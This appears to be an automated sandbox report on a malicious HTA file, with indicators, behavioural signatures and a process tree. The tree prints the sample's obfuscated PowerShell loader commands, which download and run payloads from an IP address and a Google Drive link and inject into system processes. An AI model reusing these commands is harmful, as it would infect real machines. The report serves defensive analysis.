Analysis
max time kernel: 149s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 08/11/2024, 03:53
Static task: static1
Behavioral task: behavioral1
  Sample: d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6.hta
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6.hta
  Resource: win10v2004-20241007-en
General
Target
d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6.hta
Size
207KB
MD5
21bf484c8fe4564e1f0e0fc0aa522199
SHA1
0bda2d5048d1555ef9ef50f4fd192c0838677c94
SHA256
d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6
SHA512
1dbf4a2f78b482b6d80eb48c9c2434a8907081a468c820ad9085fcede6134fe41c8c27a3e8f2ad7fa3f1d702e2b0904d885bfda8300ced9c4924c6e869e9baea
SSDEEP
96:43F97gSlqxRtwJPcEI/MOoMQbvfhKGAfQ:43F1OxvmUxevfU3Q
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
Signatures
Blocklisted process makes network request (34 IoCs)
flow  pid   Process
17    3824  poWERSHElL.EXe
22    2744  powershell.exe
25    2744  powershell.exe
29    2744  powershell.exe
43    4744  mshta.exe
46    4744  mshta.exe
48    4744  mshta.exe
52    4744  mshta.exe
53    4744  mshta.exe
54    4744  mshta.exe
56    4744  mshta.exe
57    4744  mshta.exe
58    4744  mshta.exe
59    4744  mshta.exe
60    4744  mshta.exe
67    4744  mshta.exe
70    4744  mshta.exe
71    4744  mshta.exe
72    4744  mshta.exe
73    4744  mshta.exe
75    4744  mshta.exe
77    4744  mshta.exe
78    4744  mshta.exe
79    4744  mshta.exe
80    4744  mshta.exe
82    4744  mshta.exe
84    4744  mshta.exe
85    4744  mshta.exe
86    4744  mshta.exe
87    4744  mshta.exe
89    4744  mshta.exe
91    4744  mshta.exe
92    4744  mshta.exe
93    4744  mshta.exe
Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
Runs PowerShell and hides the display window.
pid   Process
2892  powershell.exe
2744  powershell.exe
Evasion via Device Credential Deployment (2 IoCs)
pid   Process
3824  poWERSHElL.EXe
2476  powershell.exe
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description        ioc                                                                                                    Process
Key value queried  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation  mshta.exe
Key value queried  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation  WScript.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
flow  ioc
21    drive.google.com
22    drive.google.com
Suspicious use of SetThreadContext (5 IoCs)
description                            pid   Process              procid_target
PID 2744 set thread context of 720     2744  powershell.exe       109
PID 720 set thread context of 4744     720   aspnet_compiler.exe  84
PID 720 set thread context of 724      720   aspnet_compiler.exe  110
PID 724 set thread context of 4744     724   ieUnatt.exe          84
PID 724 set thread context of 440      724   ieUnatt.exe          115
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 9 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc                                                        Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cvtres.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  poWERSHElL.EXe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  csc.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  ieUnatt.exe
Modifies Internet Explorer settings (1 IoC)
description  ioc                                                                                                                  Process
Key created  \Registry\User\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2  ieUnatt.exe
Modifies registry class (1 IoC)
description  ioc                                                                              Process
Key created  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings  poWERSHElL.EXe
Suspicious behavior: EnumeratesProcesses (28 IoCs)
pid   Process              (identical rows)
3824  poWERSHElL.EXe       x2
2476  powershell.exe       x2
2892  powershell.exe       x2
2744  powershell.exe       x6
720   aspnet_compiler.exe  x8
724   ieUnatt.exe          x8
Suspicious behavior: MapViewOfSection (7 IoCs)
pid   Process              (identical rows)
720   aspnet_compiler.exe  x1
4744  mshta.exe            x2
724   ieUnatt.exe          x4
Suspicious use of AdjustPrivilegeToken (4 IoCs)
description              pid   Process
Token: SeDebugPrivilege  3824  poWERSHElL.EXe
Token: SeDebugPrivilege  2476  powershell.exe
Token: SeDebugPrivilege  2892  powershell.exe
Token: SeDebugPrivilege  2744  powershell.exe
Suspicious use of WriteProcessMemory (38 IoCs)
description                        pid   Process          procid_target  (identical rows)
PID 4744 wrote to memory of 3824   4744  mshta.exe        87             x3
PID 3824 wrote to memory of 2476   3824  poWERSHElL.EXe   90             x3
PID 3824 wrote to memory of 2836   3824  poWERSHElL.EXe   93             x3
PID 2836 wrote to memory of 4816   2836  csc.exe          96             x3
PID 3824 wrote to memory of 1252   3824  poWERSHElL.EXe   99             x3
PID 1252 wrote to memory of 2892   1252  WScript.exe      100            x3
PID 2892 wrote to memory of 2744   2892  powershell.exe   102            x3
PID 2744 wrote to memory of 3648   2744  powershell.exe   107            x3
PID 2744 wrote to memory of 4204   2744  powershell.exe   108            x3
PID 2744 wrote to memory of 720    2744  powershell.exe   109            x6
PID 4744 wrote to memory of 724    4744  mshta.exe        110            x3
PID 724 wrote to memory of 440     724   ieUnatt.exe      115            x2
Processes
C:\Windows\SysWOW64\mshta.exe (depth 1)
Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
- Blocklisted process makes network request
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID: 4744
C:\Windows\SysWOW64\winDOwSPOWERsHeLl\v1.0\poWERSHElL.EXe"C:\Windows\SySTEM32\winDOwSPOWERsHeLl\v1.0\poWERSHElL.EXe" "poWErSheLl.EXe -Ex ByPAsS -noP -W 1 -c DEviCECReDEntiaLdeployMeNT ; iEx($(IEX('[SYStEm.tExT.eNCoDiNG]'+[CHAR]58+[chAR]58+'UTf8.GEtSTRinG([SYSTem.convERT]'+[char]58+[char]0x3a+'FRoMbaSe64string('+[chAr]34+'JEY2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUkRFZkluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSmtnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVudktEYVVrdUgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWG9XdEQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRpaVh2ZEYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNWWNsQ2xJSEdibiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbk51UElVamZUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRGNjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC4yMy83OS9zZWV0aGViZXN0dGhpbmdzd2l0aGdyZWF0bWFnaWNhbHRoaW5nc3dpdGhoZXJsb3Zlci50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhncmVhdG1hZ2ljYWx0aGluZ3N3aXRoaGUudmJzIiwwLDApO3NUYXJULXNMRWVQKDMpO1NUYVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzd2l0aGdyZWF0bWFnaWNhbHRoaW5nc3dpdGhoZS52YnMi'+[ChAR]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 3824
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAsS -noP -W 1 -c DEviCECReDEntiaLdeployMeNT
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2476
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe (depth 3)
Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2ahwka2o\2ahwka2o.cmdline"
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 2836
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (depth 4)
Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8A1.tmp" "c:\Users\Admin\AppData\Local\Temp\2ahwka2o\CSC1B985D9A5D944C5C81AA4C633C44B3F.TMP"
- System Location Discovery: System Language Discovery
PID: 4816
C:\Windows\SysWOW64\WScript.exe (depth 3)
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgreatmagicalthingswithhe.vbs"
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 1252
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 4)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 2892
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('1jgim'+'ageUrl = 5bJhttps:/'+'/drive.google.c'+'om/uc?export=download&id'+'=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 5bJ;1jgwebClient = Ne'+'w-Object System.Net.WebClient;1j'+'gimageBytes = 1jgwebClient.DownloadData(1jgimageUrl);1jgimageText = [System.Text.Encoding]:'+':UTF8.GetString(1jgimageBy'+'tes);1jgstartFlag = '+'5bJ<<BASE64_START>>5bJ;1jgendFlag = 5bJ<<'+'BASE64_END>>5bJ;1jgstartIndex ='+' 1jgimageText.'+'I'+'ndexOf(1jgstartFlag);1jgendIndex = 1jgi'+'mageText.IndexO'+'f(1jgendFlag);1jgstartIndex -ge '+'0 -and 1jgendIndex -gt 1jgstartIndex;1jgstartIndex += 1jgstartFlag.Length;1jgbase64'+'Length = 1jgendIndex - 1jgstartIndex;1jgba'+'se64Command = 1jgimageText.Substring'+'(1jgstartIndex, 1jgbase64Length);1jgbase64Reve'+'rsed = -join (1jgbase64Comma'+'nd.ToCharArray() 15n ForEach-Object { 1jg_ })[-1..-(1jgbase64Command.Length)];1jgcommandBytes = [System.Convert]::FromBase6'+'4String(1jgbase64Reversed);1jgloadedAssembly = [System.Reflection.Assembly]:'+':Load(1jgcommandBytes);1jgvaiMethod = [dnlib.IO.Home].GetMethod(5bJVAI5bJ);1jgvaiMetho'+'d.Invoke(1jgnull, @(5bJtxt.FCDRW/97/32.4.371.701//:ptth5bJ, 5bJdesativado5bJ, 5bJdesativado5bJ, 5b'+'Jdesativado5bJ, 5bJaspnet_compiler5bJ, 5bJdesativado5bJ, 5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJ15bJ,5bJdesativado5bJ));').ReplacE('5bJ',[STrINg][ChaR]39).ReplacE(([ChaR]49+[ChaR]53+[ChaR]110),[STrINg][ChaR]124).ReplacE(([ChaR]49+[ChaR]106+[ChaR]103),'$')| & ((gv '*mdr*').naMe[3,11,2]-JOIN'')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 2744
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe (depth 6)
Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
PID: 3648
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe (depth 6)
Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
PID: 4204
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe (depth 6)
Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID: 720
C:\Windows\SysWOW64\ieUnatt.exe (depth 2)
Command line: "C:\Windows\SysWOW64\ieUnatt.exe"
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID: 724
C:\Program Files\Mozilla Firefox\Firefox.exe (depth 3)
Command line: "C:\Program Files\Mozilla Firefox\Firefox.exe"
PID: 440
MITRE ATT&CK Enterprise v15
Downloads